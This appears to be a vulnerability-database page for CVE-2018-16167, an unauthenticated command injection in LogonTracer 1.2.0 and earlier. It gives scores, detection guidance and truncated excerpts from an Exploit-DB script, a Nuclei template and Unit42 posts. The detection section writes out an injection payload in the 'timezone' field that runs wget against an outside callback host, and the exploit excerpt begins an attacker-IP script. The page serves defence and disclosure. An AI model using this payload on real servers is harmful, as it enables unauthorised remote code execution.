CVE-2018-16167
published 2019-01-09CVE-2018-16167: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
PriorityP190critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
74.74%
99.4th percentile
LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jpcert | logontracer | <= 1.2.0 | — |
| jpcert_coordination_center | logontracer | — | — |
Detection & IOCsextracted from sources · hover to see the quote
sigma
logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B- →Exploit targets the POST /upload endpoint with a crafted 'timezone' parameter containing a semicolon-delimited OS command injection payload (e.g., '1;<command>;'). Monitor for POST requests to /upload with semicolons in the timezone field. ↗
- →The injection is delivered via application/x-www-form-urlencoded POST body to /upload. The timezone parameter value begins with '1;' followed by the injected command and a trailing semicolon.
- →No authentication is required to exploit this vulnerability. Any unauthenticated POST to /upload with a malicious timezone value should be treated as an attack attempt. ↗
- ·The vulnerable parameter is 'timezone' in the POST body to /upload. The injection delimiter is a semicolon (;), allowing arbitrary OS command chaining after the numeric value (e.g., '1;<cmd>;'). This applies to LogonTracer 1.2.0 and earlier. ↗
- ·The logtype field is set to 'XML' in the exploit; this may be required for the vulnerable code path to be reached. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6w9j-hq73-q3m2: LogonTracer 1
ghsa_unreviewed·2022-05-14
CVE-2018-16167 [CRITICAL] CWE-78 GHSA-6w9j-hq73-q3m2: LogonTracer 1
LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
VulnCheck
jpcert logontracer Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2018·CVSS 9.8
CVE-2018-16167 [CRITICAL] jpcert logontracer Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
jpcert logontracer Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
Affected: jpcert logontracer
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://veriti.ai/blog/vulnerable-villain-when-hackers-get-hacked/
Exploit PoC: https://vulncheck.com/xdb/8f05d52a8e5f
No detection rules found.
Exploit-DB
LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)
exploitdb·2021-06-01·CVSS 9.8
CVE-2018-16167 [CRITICAL] LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)
LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)
---
# Exploit Title: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)
# Date: 29/05/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://www.jpcert.or.jp/
# Software Link: https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.0
# Version: 1.2.0 and earlier
# Tested on: Version 1.2.0 on Debian GNU/Linux 8 (jessie)
# CVE : CVE-2018-16167
import requests
import argparse
parser = argparse.ArgumentParser(description='Send a payload to a LogonTracer 1.2.0 (or earlier) server.')
parser.add_argument('aip', type=str, help='Attacker ip')
parser.add_argument('aport', type=str, help='Attacker port')
parser.add_argument('victimurl', type=str, help='Victim URL minus the path.')
args = parser.parse_args()
ATTACKER_IP =
Nuclei
LogonTracer <=1.2.0 - Remote Command Injection
nuclei·CVSS 9.8
CVE-2018-16167 [CRITICAL] LogonTracer <=1.2.0 - Remote Command Injection
LogonTracer <=1.2.0 - Remote Command Injection
LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
Template:
id: CVE-2018-16167
info:
name: LogonTracer <=1.2.0 - Remote Command Injection
author: gy741
severity: critical
description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
impact: |
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
remediation: |
Upgrade LogonTracer to a version higher than 1.2.0.
reference:
- https://www.exploit-db.com/exploits/49918
- https://nvd.nist.gov/vuln/detail/CVE-2018-16167
- https://jvn.jp/en/vu/JVNVU98026636/index.html
- https://github.com/JPCERTCC/LogonTrac
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC is working, but the service could also be used by attackers who want to be sure an exploit is working.
This blog will first introduce the Interactsh tool and how researchers or attackers can leverage it to perform vulnerability validation. We then describe some of the many exploits in the wild leveraging this tool, and we
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Threat Research Center
Threat Research
Cybercrime
## Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Yue Guan
Jin Chen
Leo Olson
Wayne Xin
Daiping Liu
Published: October 14, 2021
Cybercrime
Threat Research
Attack analysis
Exploit
Exploit in the wild
Interactsh
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh . This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC
2019-01-09
Published
Exploited in the wild